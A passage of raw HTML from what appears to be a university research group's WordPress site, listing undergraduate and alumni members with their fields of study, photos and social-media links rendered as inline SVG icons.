0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c131\" id=\"undergrads-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-828 style-local-182-c131 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c138\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-842 style-local-182-c138 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-843-outer style-local-182-c139-outer\">\n            <div data-colibri-id=\"182-c139\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-843 style-local-182-c139 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c140\" class=\"h-global-transition-all h-heading style-844 style-local-182-c140 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-844 style-local-182-c140\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Undergraduates</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c132\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-829 style-local-182-c132 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-830-outer style-local-182-c133-outer\">\n            <div data-colibri-id=\"182-c133\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-830 style-local-182-c133 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c134\" class=\"d-block style-831 style-local-182-c134 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg\" class=\"wp-image-1417 style-831-image style-local-182-c134-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-831-frameImage style-local-182-c134-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c135\" class=\"h-global-transition-all h-heading style-832 style-local-182-c135 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-832 style-local-182-c135\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Joshua Quiroz</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c136\" class=\"h-text h-text-component style-833 style-local-182-c136 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c137\" class=\"style-835 style-local-182-c137 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/joshua-quiroz-315713215/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c141\" id=\"alumni\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-910 style-local-182-c141 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c192\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-924 style-local-182-c192 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-925-outer style-local-182-c193-outer\">\n            <div data-colibri-id=\"182-c193\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-925 style-local-182-c193 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c194\" class=\"h-global-transition-all h-heading style-926 style-local-182-c194 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-926 style-local-182-c194\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Alumni</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c142\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-911 style-local-182-c142 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c143-outer\">\n            <div data-colibri-id=\"182-c143\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c143 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c144\" class=\"d-block style-913 style-local-182-c144 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Sarah_Akinola-scaled-2.jpg\" class=\"wp-image-1595 style-913-image style-local-182-c144-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c144-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c145\" class=\"h-global-transition-all h-heading style-914 style-local-182-c145 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c145\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sarah Akinola</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c146\" class=\"h-text h-text-component style-915 style-local-182-c146 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c147\" class=\"style-917 style-local-182-c147 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/akinola-sarah-035789138\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c148-outer\">\n            <div data-colibri-id=\"182-c148\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c148 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c149\" class=\"d-block style-918 style-local-182-c149 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Anvith.jpg\" class=\"wp-image-1597 style-918-image style-local-182-c149-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-918-frameImage style-local-182-c149-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c150\" class=\"h-global-transition-all h-heading style-914 style-local-182-c150 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c150\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anvith Anand</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c151\" class=\"h-text h-text-component style-915 style-local-182-c151 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c152\" class=\"style-919 style-local-182-c152 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anvith-anand\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c153-outer\">\n            <div data-colibri-id=\"182-c153\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c153 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c154\" class=\"d-block style-920 style-local-182-c154 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Alex.jpg\" class=\"wp-image-884 style-920-image style-local-182-c154-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-920-frameImage style-local-182-c154-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c155\" class=\"h-global-transition-all h-heading style-914 style-local-182-c155 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c155\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Alex Asige</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c156\" class=\"h-text h-text-component style-915 style-local-182-c156 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c157\" class=\"style-921 style-local-182-c157 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://twitter.com/i/flow/login?redirect_after_login=%2FAsigeAlex\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1347.656 445.313c0 11.719 0 26.367 0 38.086 0 407.227-310.547 875.977-875.977 875.977-172.852 0-336.914-49.805-471.68-137.695 23.438 2.93 49.805 2.93 73.242 2.93 143.555 0 278.32-46.875 383.789-131.836-134.766 0-249.023-90.82-290.039-213.867 20.508 5.859 38.086 5.859 58.594 5.859 29.297 0 55.664-2.93 82.031-8.789-140.625-29.297-246.094-155.273-246.094-301.758 0-2.93 0-2.93 0-5.859 41.016 23.438 87.891 38.086 137.695 38.086-82.031-52.734-137.695-149.414-137.695-254.883 0-55.664 17.578-108.398 43.945-155.273 149.414 187.5 377.93 310.547 632.813 322.266-5.859-23.438-8.789-46.875-8.789-70.313 0-169.922 137.695-307.617 307.617-307.617 90.82 0 169.922 38.086 225.586 96.68 70.313-14.648 137.695-38.086 196.289-73.242-23.438 70.313-73.242 131.836-134.766 169.922 61.523-8.789 120.117-23.438 175.781-49.805-41.016 61.523-93.75 117.188-152.344 161.133z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c158-outer\">\n            <div data-colibri-id=\"182-c158\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c158 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c159\" class=\"d-block style-922 style-local-182-c159 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Bhavya-scaled-1.jpg\" class=\"wp-image-776 style-922-image style-local-182-c159-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-922-frameImage style-local-182-c159-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c160\" class=\"h-global-transition-all h-heading style-914 style-local-182-c160 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c160\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Bhavya Busireddy</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c161\" class=\"h-text h-text-component style-915 style-local-182-c161 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c162\" class=\"style-923 style-local-182-c162 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/bhavya-busireddy-b052b192/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c163-outer\">\n            <div data-colibri-id=\"182-c163\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c163 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c164\" class=\"d-block style-913 style-local-182-c164 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Vineeth.jpg\" class=\"wp-image-831 style-913-image style-local-182-c164-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c164-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c165\" class=\"h-global-transition-all h-heading style-914 style-local-182-c165 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c165\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Vineeth Kumar Chandha</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c166\" class=\"h-text h-text-component style-915 style-local-182-c166 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c167\" class=\"style-917 style-local-182-c167 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/vineeth-kumar-chandha-207611149/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 